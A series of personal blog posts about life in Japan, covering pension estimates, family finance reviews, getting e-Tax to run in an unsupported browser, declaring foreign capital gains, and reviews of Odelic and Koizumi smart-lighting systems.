Since everyone pays the same amount, everyone will get the same amount. In 2024 this was ￥816,000 per year, assuming you paid for the full 40 years (20-59 years of age). I moved to Japan when I was 26, so for me this gets prorated and I expected to receive around 34/40*816,000=693,600 yen (simplified calculation, the real number depends on the actual months I paid into the system so it will be 685,100 yen as I moved to Japan 5 months after my 26th birthday). (source and my NenkinNet estimate)

So this is 68,000 yen per month for the average person (and only 57,092 yen for me).

Employees’ Pension Insurance, 厚生年金

As a company employee I’m actually paying into this second pension, and expect to receive pension from it. Here the contributions are proportional to my salary, and the payout will also depend on the amount contributed.

The contribution is calculated as 18.3% of one’s base salary plus fixed allowances (but not bonuses), and the company pays half of it, while the other half gets deducted from one’s salary. So effectively 9.15% gets deducted from each paycheck (except the yearly bonus).

The payout can be calculated with this formula: 5.481*(yearly incomes in all years while contributing)/1000. So e.g. someone with an average yearly income of 15 million yen and 34 years of contributions this would be 2,795,310 yen per year (or 232,942.5 yen per month).

Inflation adjustment

While these numbers are pretty low, at least they get adjusted by inflation (sort of): I won’t actually get 685,100 yen per year from the national pension, I will get a higher number, but I will be able to buy close to the same amount of stuff as 685,100 yen would get me today.

This reddit post nicely summarizes the yearly adjustment for 2024:

As always, and as mandated by law, pension benefits for people under age 68 move in line with average wages (minus the macroeconomic slide), whereas pension benefits for people over age 68 move in line with inflation (minus the macroeconomic slide). This year, average wages were up 2.3% and inflation was 2.7%. The macroeconomic slide was calculated as -0.4%. The same as last year, the macroeconomic slide includes a -0.1% adjustment for the change in the number of pension benefit recipients, and a -0.3% adjustment for the increase in the average life expectancy. For example, national pension benefits (Kokumin Nenkin) will increase from ¥68,000 to ¥69,308.

Though that -0.4% is sad: it should have gone up by 2.3% but instead it only went up by 1.9%. If this would stay the same for the next 34 years (until I hit 65), then that will reduce the purchasing power of the pension to (1-0.004)^34=87%. So instead of today’s 685,100 yen worth of stuff, I will only be able to get 597,821 yen of stuff. Actually not that bad, if it means that the system stays functional.

Funding

So where is the money coming from for this pension? Currently there are two sources:

	Current contributions	Government subsidies (from taxes)
National Pension	50%	50%
Employees’ Pension Insurance	75%	25%

Sources:

Chapter 1 Overview of the Pension System in Japan, page 4
Overview of the Annual Actuarial Report on the Public Pension Plans in Japan FY2022, page 24 for the Employees’ Pension Insurance

The aging population threatens the sustainability of this system, which they are trying to address in two ways:

the macroeconomic slide shown above that slightly reduces the value of the payouts year-over-year to avoid a drastic drop or insolvency
the Government Pension Investment Fund (GPIF), which is the largest pool of retirement savings in the world (source) with a whopping 258.7 trillion yen (258.7兆円) under management, which is about 2 million yen per every person in Japan. And this is currently not being used for pension payments yet, and with a rate of return of 4.4%/year (FY2001-FY2024Q3) it will just continue to grow.

Private pension

Another way the government is trying to address this is by encouraging people to save for their own retirement. The defined-contribution (DC) pension scheme introduced in the early 2000s provides tax benefits to lock up money in an investment account where it can’t be withdrawn until retirement.

My current and previous companies both participate in this. At my current role the company puts 28,000 yen every month into this account (for my role), and I can choose to contribute up to 27,000 yen per month (normally up to the company contribution, but there is an overall cap of 55,000 yen). Both of these are free of income tax at contribution time, so it is highly beneficial to contribute the maximum amount (as otherwise that 27,000 yen could loose up to half of its value to tax, depending on the tax bracket).

Money in a DC account can be invested according to the owner’s liking, however the brokerage is decided by the employer, so the available funds are often limited. I wanted to have something that’s similar to a globally diversified stock fund with low fees. The closest thing my company’s brokerage offers is the 5. 野村外国株式インデＦ野村ＤＣ which tracks the MSCI Kokusai Index (developed countries excluding Japan) with a yearly fee of 0.09889% (pretty close to eMaxis Slim All Country and Vanguard Total World). This does exclude emerging markets and Japan, but this was the closest I could get without using multiple funds and having to rebalance occasionally.

Assuming I contribute this amount from age 26 to 65 and we assume a real return of 4.5% (source), I will have 68,336,728 yen in today’s money. Let’s round this up to 70 million yen.

Calculation: let’s use the Future Value of an Annuity formula:

monthly_contribution = 55000
annual_return = 0.045  # 4.5% real return
years = 65 - 26  # from age 26 to 65
months = years * 12

# Future Value of a series formula (monthly compounding)
# FV = P * [((1 + r)^n - 1) / r]
monthly_return = (1 + annual_return) ** (1/12) - 1
future_value = monthly_contribution * (((1 + monthly_return) ** months - 1) / monthly_return)

This assumes that the monthly contributions increase with inflation (so e.g. in 10 years time I won’t be contributing 55,000 yen but more). This is not true on the short-term (as the contribution limit is not tied to inflation), so the government has to explicitly increase it, but one can hope that on the long run they will increase it frequently enough to address this.

So at 65 I have 70 million yen from this (in today’s money). Using a 3% safe withdrawal rate, this gives me an additional 2.1 million yen per year, so 175,000 yen per month.

Summary

Together all of this brings me to the following numbers per month (in today’s money):

57,092 yen from national pension (国民年金)
232,942 yen from the pension insurance (厚生年金)
175,000 yen from the private pension (DC)

Overall: 465,000 yen. Not bad, but also won’t provide for a retirement of traveling around the world and spending carelessly.

Looking ahead

I know I have it pretty well compared to most people, but looking at it at face value, it’s quite a drop in lifestyle. Of course I have other savings, and with a house likely paid off, it will be livable, but still.

But I’m actually not looking to retire. Ever since I read the 100-Year Life book, I think retirement is neither viable nor desirable. The book’s main argument is that if medical science continues to advance as it has in recent history, then half of the people born in the ’90s will live past 100 years. In this world, a retirement at 65 is simply unrealistic: we start our life with 20 years of study. Then stopping after 45 years of work and expecting to fund a 35 year retirement means one has to save a lot. Also 35 years of not doing anything just feels boring (but then again, I’m in my early 30s, so what do I know). But at this point I don’t think I will ever stop working, but instead I might reduce the amount of hours, or switch to something new (e.g. advisory role, or teaching/coaching). But then again, I’ll see it when I get old.

Source

Most of the sources are linked above. General sources used multiple times:

Family Finance Meeting

2025-03-16T00:00:00+00:00

People with (good) financial advisors often have family meetings, where they discuss financial matters (income, spending, investments) with their immediate family (spouse, kids). This can be useful for people without financial advisors too, so we decided to start doing it. In this post I’ll describe why and how we are going about it.

Why

It starts with a few questions:

Growing up, did you know how much money your parents made? How much they saved? How did they invest (if at all)?
Right now, do you know how much your partner makes and how they save/invest?
Do you know how much you make after taxes and how much of that is spent and saved? Do you know how your investments did over the last year?

For me the answer to almost all of this was no (including about my own after-tax income). I knew I could look it up, but I just never did. Thus I decided to gather the information and then have a discussion about it with my family. For now, this is my wife, as our daughter is only 1 years old (although she was present), but I also aim to use these meetings as the kid(s) are growing up to keep them in-the-loop about our finances.

Gathering the data

So we need data. Luckily we have a spreadsheet where I record income and spending each month:

Income is easy (how much hits our bank accounts). Even if we forget in a month, it can be collected later.

For spending we have the follow categories:

rent - constant, so easy
house - we are building a house, so this will replace rent soon. Until then, we are already paying the mortgage for the land, and we have misc expenses (e.g. cutting the grass on the land), so those go into this
shared account - we have a Kyash account that both my wife and I have debit cards for, and we use this for everyday spending. Utilities are also charged to this, as well as smaller trips. Here I track how much money we put into the account each month.
nursery (and in the future, general education) - mostly constant, so easy
“pocket money” for my wife and I
- I track my spendings, so I have the exact number of how much I spent
- tracking expenses individually didn’t work for my wife, so she uses a dedicated bank account where we put a fixed amount monthly, and just record that amount
extra expenses - anything major that doesn’t fit into the above categories, e.g. international trips, electric bike, buying a car. They are essentially the same as the shared account, but kept separate to make them easier to review, as they are the big expenses. Also these are usually more or less discretionary, so they can be cut back if need be (while the shared account includes mainly daily essentials, food, utilities, which are harder to reduce)

New investments are also relatively easy: we both have automated monthly investments, and when we make any additional investment (e.g. after receiving bonus at work), we just add that to the spreadsheet manually (but again, this is easy to check later if we forgot something).

Existing investment growth can be obtained from our brokerages, however they usually compare total value of portfolio a year ago vs now, so we have to subtract the new investments to get the pure investment growth (or loss).

When

This is where there are various opinions from monthly, quarterly to yearly. For now, we started doing this financial review meetings once a year around new year. It is a good time to look back at a full calendar year, and it is also the time when we have more time both to collect the data, and also to discuss it. It is also the time to make plans and resolutions for the new year, to which this data is helpful.

How

For the first trial I made a presentation with the following sections:

Highlights - major events of the year for our family
Utilities - I have the data already collected, so we checked how much we spent on utilities over the year. Our new house will have solar panels, so I’m looking forward to seeing the drop year-on-year once we move in.
Net income
Spending per category
New saving and investing
Investment growth over the last year
Market moves of the last year - we invest in total-world funds, S&P500 funds, so the moves of those two, and the yen-dollar exchange rate changes
A bit of an outlook of the potential future value of our investments

For each of these, I also added the previous year’s value and a year-over-year change with explanation (e.g. income is up, due to promotion; extra expenses is up due to more expensive flights; nursery introduced as a new category).

What I learned is that while we are looking at values from a full year, it is more intuitive to see it per month. E.g. saying that we spent 1.5 million yen on pocket money (between the two of us) sounds a lot (almost the price of a small car), but if instead we say that 125,000 yen a month, that’s more like the actual number we experienced.

The last part was also interesting/important. Last year, 2024, was exceptional for both the US and the global stock market, while the yen kept getting weaker further adding to the returns expressed in yen. The S&P500 fund in yen went up 41% (while the total world fund was up 32%). This is highly unlikely to repeat itself over the coming years, so we looked back at the historical stock market returns and had a conversation about investing in general and how the market goes up and down. We also looked at the current value of our portfolios and potential future values if the market keeps going up or if the market crashes 35%. Seeing the actual yen values is much more meaningful than simply the percentages. And after a year of 30-40% returns, even the 35% drop feels just returning to the value a year ago, so it didn’t feel as bad. But if we take today’s value as the new basis, then even a 10% drop would feel like a lot.

In hindsight, especially after the market drops of the last week, this was a very good idea. To put things into perspective, the ｅＭＡＸＩＳＳｌｉｍ米国株式（Ｓ＆Ｐ５００） fund went from 24,281 yen to 34,182 yen during the course of 2024 (+41%), and at the time of writing it is back at 29,711 yen. So after a 41% increase in 2024, now it is down 13% year-to-date. Discussing the possibility of a 35% drop and seeing the value of our holdings in that case helped us prepare for this, and reduce the stress now.

I originally wanted to do this to prepare my wife, as I am interested in investing, has been looking into this a lot (mainly listening to the RR podcast), and I felt that I was prepared. However after going through the exercise and seeing both historical returns year-over-year, as well as the potential loss if the market drops helped me internalize it more, and significantly reduced the worry now after an actual market drop.

So that’s how I run our first family finance meeting, and how we plan to do it going forward. Let me know in the comments if you do similar, organized discussions about money and how you go about them.

Using e-Tax from a non-supported browser

2025-03-11T00:00:00+00:00

Japan’s online tax filing system, e-Tax, only supports a handful of operating systems and browsers:

Windows 10 or 11 with either Microsoft Edge or Google Chrome
MacOS 12-15 with Safari

(Moreover officially the operating system has to be set to Japanese, though I don’t think they check this one.)

If you are coming from a non-supported configuration, then e-Tax refuses to start at all and simply displays an error message.

This is an issue. I use a Chromebook as my daily driver, which is entirely unsupported, together with any Linux box. Moreover on MacOS one has to use Safari and can’t use Chrome, even though the latter has better website translation feature.

Fortunately the check happens only once in the beginning of the flow, and it is done entirely on the client side. This means that it is fairly easy to bypass it and make the site believe that it is running in a supported environment.

WARNING: doing so goes against the intentions of the website developers and means that you will be using a setup that wasn’t tested. While modern browsers behave almost the same (and especially Chrome on Windows is very similar to Chrome on other platforms) there can still be cases that won’t work as expected. Proceed at your own risk.

When one clicks on the start button, the following happens:

The site checks if the browser is supported
If not, the message is shown. If yes, the flow starts

To bypass the check, we will stop between these two steps and change the result to say that the browser is supported. To do this we need to:

Go to the site that displays the error message
Right click on the site, select Inspect to open the DevTools
Go to the Sources tab
Press Ctrl + F to open the search
Search for browser. It should find a code snippet like this:

The full line is

  let returninfo = termnalInfomationCheckOS_myNumberLinkage(qrCodeReadingFlag, osType, recommendedOsAsEtax, recommendedBrowserAsEtax);

Click on the line number to place a breakpoint here. This will make the browser stop the execution whenever this line is to be executed.
On the site, press the button again
The breakpoint will be hit and the execution will pause
Switch over to the Console tab. Now we can see the values of the variables and we can also change them. From the code, we can see that the variable returninfo is the one holding the information about whether the browser is supported or not. Currently returninfo.errcode is -1. Let’s set it to 0 (success) by running returninfo.errcode = 0; in the console

Continue the execution with the ▶️ button (might be in the top middle of the grayed-out page)
The flow should start as if the browser is a supported one

Calculating and declaring capital gains tax in Japan

2025-03-11T00:00:00+00:00

Last year I sold some ETFs in my Interactive Brokers account, which doesn’t withhold taxes in Japan, so I had to report it in my tax return (確定申告) and pay tax on it. In this post I’ll share how I went about this.

This is not tax advice, and it might be incorrect/incomplete or simply doesn’t apply to your situation. Do your own research and do not follow this blindly.

Step 1: do I need to pay tax?

First things first: capital gains from stocks, ETFs, funds, etc., are only taxable when one sells something for more than they bought it for. Just because the value of your holdings went up, it is not a taxable until you sell it (in general). Also if you sell something at a loss, you don’t have to pay tax on it, but you can use it to offset gains and reduce your tax.

Japan is actually pretty good about helping people not have to worry about capital gains tax. Japanese brokerages will withhold the tax (unless you ask them not to), and one doesn’t need to include these in their tax return, even if they file a tax return for other reasons (e.g. medical deductions). The reason this doesn’t help me is that I opened an account with Interactive Brokers LLC (when they still allowed that in Japan, nowadays they only let people open accounts with Interactive Brokers Japan that will withhold taxes for you).

Moreover when a foreigner living in Japan is not yet a permanent tax resident, some capital gains are not taxed in Japan, so if this applies to you, look into this more. I’m a permanent tax resident already, so this didn’t apply to me.

As a Hungarian citizen with tax residency in Japan, I am not required to file taxes in Hungary, and as long as I declare all my income in Japan and pay taxes here, I’m good. But other countries might require you to file taxes there too.

Step 2: calculating the tax

TLDR: Japan counts in yen.

Let’s start with an example:

on January 11th, 2022: I bought 60 shares of SIVR ETFs for $21.73 a piece for an overall of $1,303.80
on May 2nd, 2024: I sold all of them for $25.15 a piece for an overall of $1,508.70

So I made $204.90, right? Interactive Brokers will actually show this number and then convert it to yen on the exchange rate of the day of sale, getting to 31,482.90 yen. However the NTA calculates differently as they only think in yen. So in their thinking:

on January 11th, 2022: I bought the shares for 151,684 yen ($1,303.80 in yen on that day)
on May 2nd, 2024: I sold the shares for 234,060 yen ($1,508.70 in yen on that day)

So according to NTA my gain was 82,376 yen, quite a bit more than the other calculation (due to the yen’s depreciation in this time). It doesn’t matter if I did the currency conversions on that day or not, this is how the NTA calculates the tax, so this is how I have to do it too.

There is one additional detail: transaction fees can be deducted from the gains. So the cost basis gets a bit higher, and the final sale price a bit lower. This concept applies to exchange rates too, but more on that later.

Multiple purchases

If one has bought the same stocks multiple times in the past, then NTA uses the weighted average method to calculate the acquisition price: e.g. if you bought 100 stocks for 10,000 yen a piece, then 200 stocks for 12,000 yen a piece. Overall you spent 100*10,000+200*12,000=3,400,000 for 300 stocks, so the average price is 3,400,000/300=11,333.33 yen. If one would to sell e.g. 10 stocks, then their cost basis would be 113,333.33 yen. Source and more official examples are here.

Exchange rates

For the historic exchange rates I found that many online sources recommend MUFG’s spreadsheets that go back a long time, so I was using this. This includes 3 values for each day:

TTS: the amount of yen I have to pay to get 1 dollar (highest of the 3)
TTB: the amount of yen I get for 1 dollar (lowest of the 3)
TTM: mid-price of the above two

I use TTS when buying stocks, since I take my yen, convert it to dollar at TTS, then buy the stock. When selling the stock, it’s TTB: I sell the stock then convert the dollars to yen at TTB. This calculation works in our favor (reduces the gains in yen slightly to account for the fee of the conversion). (Source1, Source2).

Steps to calculate the gains

Summarizing the above for the simple case of buying once and then selling it all at once, we have to do the following steps:

Record the purchase price in dollar
Add any transaction fees. This is your cost basis in dollar
Look up the TTS on that day and use it to convert it to yen. This is your cost basis in yen
Record the sold price in dollar
Subtract any transaction fees
Look up the TTB for the day of sale and use it to convert it to yen.
Subtract the cost basis in yen from this, and you got your gains.

Calculate the tax

[edit on 2025. Nov 23.]: an earlier version of this post incorrectly said that the capital gains have two taxation method one can choose from. In reality, that choice is only available for dividend income: source. Thanks to starkimpossibility over at JapanFinance for catching this mistake.

In principal, capital gains are taxed at a flat 15% rate, regardless of other income.

One more thing: after the Great East Japan Earthquake of 2011, an additional tax was introduced to help fund recovery efforts. This is called the “Special Income Tax for Reconstruction” (復興特別所得税) and it adds an additional 2.1% on top of all income tax. So the 15% becomes 15*1.021=15.315%. This additional tax was introduced in 2013 and is currently set to continue until 2037 (source).

Moreover there is an additional 5% residence tax that one will have to pay to their local municipality, but that is billed in June the year after the income was realized and then either paid in lump sum or deducted from the salary during the next 12 months.

TLDR: the tax to pay at filing time is 15.315% of the gains. Then from June, the residence tax goes up with an additional 5% of the gains.

Step 3: tax filing

Once we are done with the calculation, the actual filing is pretty straightforward.

1. Indicate that we have income from capital gains

2. On the income page, select the capital gains, dividends box

3. Decide whether you have a special account you want to report

As far as I know these are accounts that withhold taxes, so one would only need to report them if they want to use losses there to offset other gains.

4. I have a non-special account to report

And I sold listed stocks, 上場株式等 (as opposed to common stocks which mean unlisted).

5. Go to input

6. Detailed reporting or summary only

On the next page we can select whether we want to input the details of each transaction, or just the summary. I will show both.

7a Entering the details of a transaction

Example input and official explanation is available here.

The fields are:

Day of the sale
Name of the company - I used the ticker symbol
Number of stocks sold
Brokerage - I wrote インタラクティブ・ブローカーズ証券株式会社
Sold price
Cost basis (purchase price minus transaction fees at purchase)
Transaction fees at selling
Day of purchase - if purchased multiple times, enter the most recent date

Then repeat this for all transactions, and the summary page will show the sum of all input.

On the next page we have 3 more fields that I left empty:

Any additional income from selling the stocks
Any other expenses associated with the transaction (name and amount)

7b Entering the summary-only

Alternatively one can simply enter the final summary of all trades.

Fields here are the same as on the last page of the previous method, but we have to enter everything ourselves:

Overall sold price
Any additional income from selling the stocks (I left it empty)
Overall cost basis (purchase price minus transaction fees at purchase)
Overall transaction fees at selling
Any other expenses associated with the transaction (name and amount) - I left this empty too

8 Confirm the capital gains income

Once we are done and return to the main incomes page, a confirmation message will show the overall income from capital gains. Check this with your own calculations to ensure you entered everything correctly.

And that’s it.

As I said on the top, this is not tax advice. Check the linked sources and do your own research.

Odelic Connected Lighting

2025-01-26T00:00:00+00:00

We are building a house, and I recently looked into smart lighting and light switches concluding that the best option for us was likely Panasonic’s Advance Series Link Plus, which later I did a deep-dive on. Then I took a look at Koizumi’s TRee system, and now to finish up my investigation into Japanese smart lighting systems, I will share what I learned about Odelic’s Connected Lighting.

The system

Unlike Panasonic’s and Koizumi’s setup, Odelic’s Connected Lighting doesn’t offer switches in the traditional sense (something that starts/stops the flow of electricity), instead the lights are meant to be connected to power at all times and then remote controllers are used to turn them on or off (a bit similar to Phillips Hue). They do make some switch-like remote controllers though:

Both the switches and the controllers use Bluetooth (presumably BLE).

The FAQ still recommends to have a real light switch as it is required for pairing or when the remote runs out of battery:

Q.3 Bluetooth(無線)制御だからスイッチは不要ですか？

A.3 必ず壁スイッチを設置してください。初回接続設定(器具登録)をおこなう時に、壁スイッチが必ず必要です。コントローラー(リモコン・タブレット・スマートフォン)の電池切れや故障の際の点灯に必要です。

I talked about why I prefer a system with real smart switches in my first post on the topic, but due to that preference, these controllers won’t change my choice for Panasonic’s smart switches.

Light options: excellent

Many of their lights are available in smart version and everything is part of this single system. Also they mark it very clearly in their catalog and in the showroom which light is smart. Moreover since the light itself is smart, almost all of them allow adjustment of not only the brightness but also the color temperature or color (full RGB range).

Control options: mixed

Despite the system running on Bluetooth, the control options could be improved.

Remote controllers

The physical remote controllers seem to be working well (at least in the showroom they were fine, I didn’t have the opportunity to do the pairing process though). Also they are available in multiple form-factors, which is pretty nice:

I personally like the idea of having that joystick in the middle of the switch to control the brightness and color, while the top/bottom of the switch turns it on/off.

The touchless switch is pretty interesting too and worked as expected in the showroom:

These definitely feel like the main way how the designers thought about people using the system.

Motion sensors

Odelic offers a few motion sensors that also communicate via Bluetooth so they can control the lights. I couldn’t find these in the showroom, so I’m not sure how well they work.

Smart phone

The site lists controlling from smart phone with linking to both an Android and an iOS app and highlighting the following feautres:

お手持ちのスマートフォンをリモコンとして、調光・調色ができます。

5シーンまで登録設定ができます。

就寝前、お目覚め時のあかりをタイマー設定ができます。

Translation:

You can use your smartphone as a remote control to adjust the brightness and color.

Up to five scenes can be registered.

You can set a timer for the lights before you go to sleep and when you wake up.

However their FAQ says the Connected lighting doesn’t use the Internet, so it cannot be controlled from outside the home:

Q.8 外出先から防犯のためにON/OFFしたいのですが、可能ですか？

A.8 コネクテッドライティングはインターネットを使用していないため、外出先からの操作はできません。

So the app likely works with local Bluetooth only. I wonder if this could be a problem in bigger homes.

Also both apps have terrible ratings. Currently the Android app has 1.5 stars, and the iOS app has 1.7 starts (both out of 5, but 1 being the lowest it means most people gave it a 1).

Voice control

Remember that there is no hub so the lights are not connected to the internet? This pretty much rules out any of the usual voice controls (Google Home, Alexa, etc.) (or so I thought, see later). Instead Odelic made their own voice control device:

I didn’t have a chance to try it, but I found this official demo video:

Despite the video looking like someone’s highschool project, the device looks pretty good. I wonder how well it really works in real life, and whether it works locally or connects to some server. Also there is no mention of supporting any language other than Japanese.

Smart speaker control

Wait, doesn’t the FAQ say that the lights don’t connect to the internet so they can only be changed locally? Odelic came up with a solution to make it work with smart speakers: they will sell you a tablet to bridge the gap.

I tried this tablet in the showroom and it was a simple Lenovo tablet with a custom app running on it (though the tablet might not be the same than the one they are selling). I couldn’t find the tablet from Odelic directly, but on Rakuten and Amazon it is being sold for around 57,000 yen.

There are actually 3 apps for the tablet: for home, for shop, and for office:

The tablet in the showroom had the Home version, and it felt pretty utilitarian (lot of details, not much design or animations). Here is a photo of it that I took:

The buttons worked as advertised, but there was no Google Home to test that integration with.

ECHONET Lite and Home Assistant support

I couldn’t find anything to this extent. Considering that without the tablet the lights are Bluetooth-only, I don’t expect ECHONET Lite support. Though the tablet seem to be pulling data from other ECHONET Lite devices, so they might add support for it in the future.

I also couldn’t find Home Assistant support yet, even though that could work via Bluetooth as well.

Conclusion

We really loved the design of the Odelic lights, so we will likely get a few from them (and all of those will be the Connected Lighting version). I wish their software support would be better, and I’m hoping I can connect them to Home Assistant somehow, as without that we would need to buy their overprice remote controllers or tablet.

One more thing: the Odelic showroom was great! It’s a bit out of the way, but they had many lights (and the full fleet of smart controllers), the staff was helpful and ready to answer our questions, and they even had a playroom for kids.

TRee: Koizumi's smart light system

2025-01-25T00:00:00+00:00

We are building a house, and I recently looked into smart lighting and light switches concluding that the best option for us was likely Panasonic’s Advance Series Link Plus, which later I did a deep-dive on. Then we started looking at the actual lights to see what fits with our design, and found Panasonic’s offerings underwhelming. This made us look at other manufacturers, namely Koizumi and Odelic. They both have smart lights, so I will share what I learned about each, started with Koizumi.

The system: TRee

Koizumi’s smart lighting solution is called TRee (good luck trying to search it). It’s a pretty usual system: smart switches, smart lights, and hubs. They have a wired and a wireless setup each with their own set of switches (which doesn’t seem to be cross-compatible due to the different connection to the hub).

In the wired setup the hub is called Smart Adapter (スマートアダプタ, AE49233E):

In the wireless setup the hub is called Smart Bridge (スマートブリッジ, AE50264E), and despite its wireless nature, it still needs an Ethernet cable to connect to the network (similar to Panasonic’s solution).

I asked Koizumi what the difference is between these two systems, and they said there is no difference:

スマートブリッジ（AE50264E）とスマートアダプタ（AE49233E)は TReeシステムを使用する上で違いはございません

Wireless switches

Light Controller ライトコントローラ

These look like regular switches, but all of them are touch type (which made us not even consider them as we want real switches).

AE50267E: white, on/off (same in black: AE50270E)
AE50268E: white, dimmable (same in black: AE50271E)
AE50269E: white, dimmable (same in black: AE50272E)

Memory Light Controller メモリーライトコントローラ

These look even less like switches.

AE50265E (shop) (same in black: AE50266E)

Wired switches

Smart Switch スマートスイッチ

Seems like it’s only available in a single version: white and one button: AE49235E

Memory Light Controller メモリーライトコントローラ

Multi-button panel like the other memory light controller. Only one option AE49236E.

Smart lights

They have many smart lights, so I’ll just pick one example, a spot light meant to be on rails (AS56297):

The interesting thing is that the light itself seem to have Bluetooth and allows adjusting not just the brightness but also the color temperature. I wonder if this is compatible with one of the dimmer switches (out of the 2 light controllers). The first says 調光タイプ(逆位相制御方式), which is the usual dimmer switch (and thus likely incompatible with smart lights like this), but the other type says Fit調色タイプ which might be a more likely to work with some lights, although this specific light doesn’t mention Fit調色 on its page.

ECHONET Lite and Home Assistant support

TRee’s website says that the system support ECHONET Lite and the echonetlite_homeassistant lists the smart bridge (AE50264E) as a supported device.

Asking Koizumi support

Unfortunately the Koizumi showroom is mainly aimed at companies, and is only open on weekdays, so I couldn’t visit. But they have an online form for product questions that I submitted. Here are my questions and their answers:

Topic	Japanese	English
Hubs	スマートブリッジ（AE50264E）とスマートアダプタ（AE49233E)にはどのような違いがありますか？採用する場合はどちらも必要か、それともどちらか一つで良いでしょうか？	What’s the difference between スマートブリッジ (AE50264E) and スマートアダプタ (AE49233E)? Do we need both or is one of them enough?
	スマートブリッジ（AE50264E）とスマートアダプタ（AE49233E)はTReeシステムを使用する上で違いはございません。但し、スマートブリッジ（AE50264E）は「ライトコントローラ」と無線接続を行う必要が有るので、「ライトコントローラ」の近くに設置頂く必要がございます。	There is no difference between the Smart Bridge (AE50264E) and the Smart Adapter (AE49233E) when using the TRee system. However, the Smart Bridge (AE50264E) needs to connect wirelessly to the “Light Controller”, so it needs to be installed near the “Light Controller”.
Smart switch	スマートスイッチ (AE49235E) は、他社製の照明と互換性があり連動しますか？また、スマートスイッチは「ライトコントローラー」とどのように違いますか？スマートスイッチには、ダイヤルスイッチやダブルスイッチなどの選択肢もありますか？	Is the スマートスイッチ (AE49235E) compatible with lights made by other companies? How is this switch different from ライトコントローラ? Is it available in any other form (e.g. dimmable, double) or color?
	スマートスイッチ (AE49235E)は、弊社の適合する照明器具としか使用出来ず、他社製照明器具との適合確認は行っておりません。スマートスイッチ (AE49235E)は、照明器具のON/OFFしか出来ません。	The Smart Switch (AE49235E) can only be used with lighting fixtures that are compatible with our company, and we have not confirmed compatibility with lighting fixtures made by other companies. The Smart Switch (AE49235E) can only turn lighting fixtures on and off.
Light controller	ライトコントローラ (AE50267E, AE50268E, AE50269E) は、他社製の照明と互換性があり、連動しますか？また、スイッチのボタンはすべて「タッチ式」で、それ以外はないのでしょうか？	Are the ライトコントローラ (AE50267E, AE50268E, AE50269E) compatible with lights made by other companies? Do they have a non-touch version with a normal button?
	ライトコントローラ (AE50267E, AE50268E, AE50269E) も、弊社の適合する照明器具としか使用出来ず、他社製照明器具との適合確認は行っておりません。全て操作はタッチ式になります。	The light controllers (AE50267E, AE50268E, AE50269E) can only be used with lighting fixtures that are compatible with our company, and we have not confirmed compatibility with lighting fixtures made by other companies. All operations are touch-type.
Memory light controller	メモリーライトコントローラ (AE50265E) は、他社製の照明と互換性があり、連動しますか？	Are the メモリーライトコントローラ (AE50265E) compatible with lights made by other companies?
	メモリーライトコントローラ (AE50265E) も、弊社の適合する照明器具としか使用出来ず、他社製照明器具との適合確認は行っておりません。	The Memory Light Controller (AE50265E) can only be used with lighting fixtures that are compatible with our company, and we have not confirmed compatibility with lighting fixtures made by other manufacturers.
Smart lights	御社のスマートライトは、他社製のスイッチ（Panasonicのスイッチなど）と連動しますか？例えば、他社製の照明スイッチに接続されたダクトレールに、Koizumiのスポットライト（AS56297）を設置した場合、TReeアプリやGooglehomeを使って照明の調整が可能ですか？	Are the smart lights compatible with switches made by other companies? E.g. if I add AS56297 (duck rail spot light) to a rail that’s connected to a normal light switch made by another company, can I use the TRee app and Google Home to adjust the brightness and color of the light?
	スポットライト（AS56297）は、通常のON/OFFスイッチにしか組合せ出来ませんが、ON/OFFスイッチであれば他メーカーのスイッチでも問題ございません。別売のBluetooth対応スマートブリッジ【AE54355E】と「TRee plus」で設定頂く事で、Googlehomeで音声操作頂く事が可能です。	The spotlight (AS56297) can only be paired with a regular ON/OFF switch, but other manufacturers’ ON/OFF switches are also fine. By setting up the separately sold Bluetooth-enabled smart bridge [AE54355E] and “TRee plus”, you can control it with your voice using Google Home.
When the WiFi or hub is down	スマートブリッジやWifiが動かない時でも、スマートスイッチ、ライトコントローラー、メモリーライトコントローラは、普通のスイッチとして、照明をつけたり消したりできますか？	Do the スマートスイッチ, ライトコントローラ, メモリーライトコントローラ still work if the hub or WiFi is not working? Will pressing the button turn on/off the light?
	スマートブリッジやWiFiが動かない場合でも、スマートスイッチ・ライトコントローラ・メモリライトコントローラで手動操作は可能です。	Even if the Smart Bridge or WiFi doesn’t work, you can still operate it manually using the Smart Switch, Light Controller, and Memory Light Controller.

Deprecation notice

At the end of their email they added this additional note:

なお、スマートブリッジ（AE50264E）ライトコントローラ (AE50267E, AE50268E, AE50269E)メモリーライトコントローラ (AE50265E)につきましては、すべて生産完了品になります。

現行製品はBluetooth対応器具となっており、それぞれの後継品は下記となります。

スマートブリッジ（AE50264E）→【AE54355E】

ライトコントローラ (AE50267E）→【AE54345E】（AE50268E）→【AE54344E】（AE50269E) →【AE54343E】

メモリーライトコントローラ（AE50265E）→【AE54341E】

になります。

Bluetooth版TReeシステムにつきましては、以下URL　WEBカタログ内の、「照明制御システム（ツリー）Bluetooth対応　ライトコントローラー　2023年10月価格改訂版」をご確認いただきますようお願いいたします。

URL：https://www.koizumi-lt.co.jp/product/webcatalog/index.html

Translated:

Please note that the Smart Bridge (AE50264E), Light Controller (AE50267E, AE50268E, AE50269E), and Memory Light Controller (AE50265E) are all discontinued products.

The current products are Bluetooth-compatible devices, and their successors are as follows.

Smart Bridge (AE50264E) → [AE54355E]

Light Controller (AE50267E) → [AE54345E] (AE50268E) → [AE54344E] (AE50269E) → [AE54343E]

Memory Light Controller (AE50265E) → [AE54341E]

For details about the Bluetooth version of the TRee system, please see the “Lighting Control System (Tree) Bluetooth-Compatible Light Controller October 2023 Price Revised Edition” in the web catalog at the following URL.

URL: https://www.koizumi-lt.co.jp/product/webcatalog/index.html

My conclusion

For us having physical buttons (non touch types) was important, which already disqualified most of the Koizumi’s offerings.

Moreover their system is a overcomplicated:

wired and wireless being supported in parallel
old system using zigbee while the new is using bluetooth
even their own main marketing page is showing model numbers that customer service is saying are discontinued

which combined with their higher price point than Panasonic and no clear benefit that I could see mean that I would recommend Panasonic’s Advance Series Link Plus to most people and I won’t be looking deeper into Koizumi’s smart switches.

We might still choose some smart lights from Koizumi and use their hub to control them remotely (which they confirmed should work with switches from another company), but we won’t be using their smart switches.

On investment risk

2024-12-08T00:00:00+00:00

This is something that I have been trying to wrap my head around for a while: people say that the global stock market returns around 5% yearly (on top of inflation, based on the last 100 year), but it’s still risky and the risk is the volatility: the stock returns change a lot year over year, but on the long run they average out. But if the returns average out, then as long as I don’t check my portfolio daily and make bad decisions on short-term swings, I should be fine, right? If yes, then where is the risk? And in general how is volatility the same as risk?

Roulette

